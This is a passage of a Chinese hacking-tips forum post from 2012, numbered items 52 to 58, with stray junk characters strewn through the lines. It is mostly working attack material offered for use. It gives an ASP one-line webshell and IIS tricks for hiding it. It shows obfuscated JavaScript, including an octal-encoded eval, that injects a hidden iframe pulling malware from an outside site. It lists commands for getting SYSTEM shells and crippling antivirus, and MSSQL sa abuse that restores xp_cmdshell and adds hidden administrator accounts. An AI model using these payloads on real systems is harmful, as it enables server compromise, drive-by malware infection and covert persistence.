% J. @0 {% w7 C+ t. @* p0 _; @52、at "12:17" /interactive cmd# h6 Y1 \* u" R+ G7 A T r
执行后可以用AT命令查看新加的任务4 ~! V1 Y% B' p* k9 S9 v: M
用AT这个命令以交互的方式运行cmd.exe 这样运行的cmd.exe是system权限。
) u9 M- w* \( f' b" ^& D) | Z+ _1 O* B
53、隐藏ASP后门的两种方法
9 N! `( O( a' \! e2 W4 S0 b1、建立非标准目录:mkdir images..\0 o# c# |! q& J, T4 [% y) I
拷贝ASP木马至目录:copy c:\inetpub\wwwroot\dbm6.asp c:\inetpub\wwwroot\images..\news.asp
' u m* |* _' M! \, }5 Y# p& V通过web访问ASP木马:http://ip/images../news.asp?action=login7 X; x2 u* j* a a# p% [( R8 E6 t
如何删除非标准目录:rmdir images..\ /s3 e7 C: B% |" p
2、Windows中的IIS会对以.asp结尾的目录中的文件进行解析,以达到我们隐藏自己的网页后门的目的:
" o5 l, h+ [, A% J, Y& I, W9 nmkdir programme.asp
/ p! ]" T- F* L0 C# d* [9 X2 g新建1.txt文件内容:<!--#include file=”12.jpg”-->/ S1 o" i7 ~/ E( F6 W
新建12.jpg文件内容:<%execute(request("l"))%> 或使用GIF与ASP合并后的文件6 U7 T1 \ X3 Q/ M" Y* a' N
attrib +H +S programme.asp
5 q* D, Q' b' L通过web访问ASP一句话木马:http://ip/images/programme.asp/1.txt: j/ r6 Z4 H; c+ q
$ J2 F% u9 H3 P54、attrib /d /s c:\windows +h +s,后windows目录变为隐藏+系统,隐藏属性为灰不可更改,windows目录下面的文件和目录并没有继承属性,原来是什么样还是什么样。
; B! r# s) S& H' m, l; P6 b然后在利用attrib /d /s c:\windows -h -s,windows目录可以显示,隐藏属性可以再次选中。( g8 ]* a. h3 u3 x6 p: A
5 x4 o% B. R; S5 D& @ L& W3 g55、JS隐蔽挂马! \" A: L: y% m/ V/ T* z
1.
6 k7 y! o- R" N3 A$ ^( |1 }* Rvar tr4c3="<iframe src=ht";& ]# s7 `: y& d$ Y- d/ p" J& ^
tr4c3 = tr4c3+"tp:/";
! N% W6 Q7 @, u ztr4c3 = tr4c3+"/ww";
$ ~) x/ w& ^: c2 N3 t) ltr4c3 = tr4c3+"w.tr4";, N: B0 ^# e# c* D/ d
tr4c3 = tr4c3+"c3.com/inc/m";. t! d! M2 F1 T* _2 |1 B
tr4c3 = tr4c3+"m.htm style="display:none"></i";
5 o, O. U* ^" X0 ~% Gtr4c3 =tr4c3+"frame>'";' g9 z- X) I$ K3 q# C5 t
document.write(tr4c3);
0 Y% {: p! v f. i8 i避免被管理员搜索网马地址找出来。把变量名定义的和网站本身的接近些,混淆度增加。6 D6 [3 K1 I7 K! k/ j+ a
4 R' U" _# C# C% |2.; H1 Y! Y8 [$ e# ~
转换进制,然后用EVAL执行。如( `- P T& u2 x) P) b; K
eval("\144\157\143\165\155\145\156\164\56\167\162\151\164\145\40\50\42\74\151\146\162\141\155\145\40\163\162\143\75\150\164\164\160\72\57\57\167\167\167\56\164\162\64\143\63\56\143\157\155\57\151\156\143\57\155\155\56\150\164\155\40\163\164\171\154\145\75\42\42\144\151\163\160\154\141\171\72\156\157\156\145\42\42\76\74\57\151\146\162\141\155\145\76\42\51\73");
3 t. d/ N0 |% ^+ B不过这个有点显眼。' V" z( v; }9 }7 H: T6 U
3.
2 b6 a' Q& Z# Q! T7 E9 R, Qdocument.write ('<iframe src=http://www.tr4c3.com/inc/mm.htm style="display:none"></iframe>');
2 f) z6 l5 X; P) j# V$ h! x$ f最后一点,别忘了把文件的时间也修改下。6 m. c2 u8 n' f8 T4 ~0 O4 g
8 U. J% `5 C' Y9 n2 |$ }56.3389终端入侵常用DOS命令; p! v4 o: v9 z* _) F$ U) e
taskkill taskkill /PID 1248 /t
# n' a$ Z! j( m+ y2 G! L6 z7 c- x0 ?9 G) q
tasklist 查进程$ J0 x# Z/ L- h" \7 {$ a0 w
1 R% I& b: C7 |( b; @% Ncacls "C:\Program Files\ewido anti-spyware 4.0\guard.exe" /d:everyone 改、降低某文件权限2 g7 t: R5 E; g- C
iisreset /reboot% T2 h2 E( p; z& p' B/ j) S
tsshutdn /reboot /delay:1 重起服务器
, t6 a" A2 `1 a1 i! m6 v( f( x4 f' s4 _4 ]& e3 m3 a
logoff 12 要使用会话 ID(例如,会话 12)从会话中注销用户,5 h, |, k* T) t4 X2 S6 d
; v/ M6 o* B) n) b, X
query user 查看当前终端用户在线情况
- N0 J* Z# M$ O# }' X8 |2 B8 X
# A; O) h! e: s7 P6 {# c# y要显示有关所有会话使用的进程的信息,请键入:query process *
I+ j( z! o! o8 e3 t @7 b1 E4 x# N
要显示有关会话 ID 2 使用的进程的信息,请键入:query process /ID:2
2 @% I' Z4 b3 L# C/ Z a2 |. u4 v9 ]7 j) e7 A% j% T! x$ _
要显示有关服务器 SERVER2 上所有活动会话的信息,请键入:query session /server:SERVER2
3 |& k) @! m6 |8 ]) f$ q! a) [, n
要显示有关当前会话 MODEM02 的信息,请键入:query session MODEM02* p/ }2 S0 D2 L8 [
4 z. S% c' H. K ~ h# n) |9 t命令列:rundll32.exe user.exe,restartwindows 功能: 系统重启# ~% s" n( j* ] U
" C" ^5 Y9 [, K( Z8 x
命令列:rundll32.exe user.exe,exitwindows 功能: 关闭系统' b# ^! n! V4 s6 i; F
/ n0 \9 m& ~: ?2 B) f
命令列: rundll32.exe user.exe,restartwindows 功能: 强行关闭所有程式并重启机器。; x5 W3 M. d7 x; B9 r( [
( @" `! x& q9 n; J; P+ G% B
命令列: rundll32.exe user.exe,exitwindows 功能: 强行关闭所有程式并关机0 K/ @% k- @1 F5 h8 E" ~. j
/ }' M- w1 U/ ^+ L56、在地址栏或按Ctrl+O,输入:* m& O( P: x" ?( w
javascript:s=document.documentElement.outerHTML;document.write('<body></body>');document.body.innerText=s; Q9 H j0 n7 {+ N# J4 c
0 K( h) ]" V& ?- l* E源代码就出来了。不论加密如何复杂,最终都要还原成浏览器可以解析的html代码,而documentElement.outerHTML正是最终的结果。
% t( @6 Q" f5 g
+ l/ S# [: z3 c. T& l* Z57、net user的时候,是不能显示加$的用户,但是如果不处理的话,
, G: c; _5 S: _: G1 f用net localgroup administrators是可以看到管理组下,加了$的用户的。: l6 n) T, b( s) U2 ], D/ F
0 o, p/ F8 r+ R K' B, D) {+ X
58、 sa弱口令相关命令! J% p, k# H( d4 F; u2 H5 f2 {
" `" z" I0 p+ p* n' H
一.更改sa口令方法:
! B* B" o9 {4 ~& O# y( h" h h用sql综合利用工具连接后,执行命令: _& l( q# A, x4 \
exec sp_password NULL,'20001001','sa'3 U2 ^ F/ _1 M8 J' {
(提示:慎用!)) u; {: ^4 {& H$ n7 x% i
4 O; j. V( p9 p8 Y
二.简单修补sa弱口令.
# y/ _* i- T: O" j/ J* A+ p' B
* r5 X+ r( X' M* G1 n方法1:查询分离器连接后执行:5 A1 c! ]- r4 [4 q7 ?
if exists (select * from4 [" x* B( w* H) c( K
dbo.sysobjects where id = object_id(N'[dbo].[xp_cmdshell]') and
: w! j: P# S( J9 o+ n9 ]OBJECTPROPERTY(id, N'IsExtendedProc') = 1)5 c. M- Z1 ~. s
]% l# x" d6 Vexec sp_dropextendedproc N'[dbo].[xp_cmdshell]'" W F6 |4 s( N b
' q8 r: \2 ]/ ]0 g$ G$ k4 T: C, n9 X' ?
GO/ y& O8 j6 Y3 E, l
" q5 L% ?6 Y# B然后按F5键命令执行完毕
: V# T' k. H; }; x' u! c. |5 h# F/ H0 i. [9 X* M
方法2:查询分离器连接后
g7 U/ G+ I4 e6 z8 S第一步执行:use master
( n9 S% U4 ?9 n$ l第二步执行:sp_dropextendedproc 'xp_cmdshell'. p+ {: Y1 e- R5 C
然后按F5键命令执行完毕! x* u7 P, m; ? W3 h
) {0 p$ C+ ?/ j; t4 _2 U7 X: v. q6 L9 {, E3 ~( `
三.常见情况恢复执行xp_cmdshell.
9 ?3 n- \2 M# |) k9 _% d' \
5 X2 a& t5 o {1 G
) F, B$ K4 e! n% V( ?' a1 ^/ a1 未能找到存储过程'master..xpcmdshell'.5 \# l4 Y/ N( {. e
恢复方法:查询分离器连接后,8 K% }) V& v$ t& ^$ A& F
第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int' s/ B* A4 e9 E$ a4 w/ x
第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
1 ~% u6 B# @9 l& E# } f6 @然后按F5键命令执行完毕
( x2 U6 j( o" ?& O- A, N! h( t+ x0 u1 t7 f4 U @
2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一 DLL。原因126(找不到指定模块。)
/ y$ D/ O& ^' j: x( X- {% a. v恢复方法:查询分离器连接后,# i8 p8 r5 {0 B: g9 K
第一步执行:sp_dropextendedproc "xp_cmdshell"* a. M0 c$ b& J; W4 f
第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll') H' B$ F& R& m1 e X
然后按F5键命令执行完毕$ j- T1 k+ U% y
' b- p$ ^; e9 \0 O* B e( l% q% h P3 无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。)
9 l0 R- Q! P& j9 k" m恢复方法:查询分离器连接后,
& o p2 @) Z( ?3 \' V第一步执行:exec sp_dropextendedproc 'xp_cmdshell'
! y* |7 r5 M! h第二步执行:exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll'
1 U; \! u5 ]; [2 Y然后按F5键命令执行完毕! l8 W9 P% F( `: T8 U8 X/ V5 N
& t; L5 f. {3 a. t- E5 s/ C四.终极方法.5 P6 }8 W% {* ~$ }$ A
如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户:
* \) I3 B4 l8 {6 n+ h2 E- J查询分离器连接后,
- c( a8 O# Q- O% O! V) Z/ H! Z5 Q2000servser系统:$ s6 G6 i7 S5 z. _ A8 c+ {
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user 用户名 密码 /add'4 h/ W0 ?7 W* }6 g! l
" K' J( N/ g; a: J+ A9 o) ~declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators 用户名 /add'8 }) v7 t, J' E( Q" [8 G
* c5 |' `& H% O! \
xp或2003server系统:
7 G6 P3 A- L9 D7 v6 k& w7 f3 u+ W% X( C
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 用户名 密码 /add'
+ \( t( \2 e# H/ R4 B. i
2 B) `( b' u {declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 用户名 /add'/ I- C& X8 Q1 u0 { B
|
发表于 2012-9-15 14:13:15
收藏
支持
反对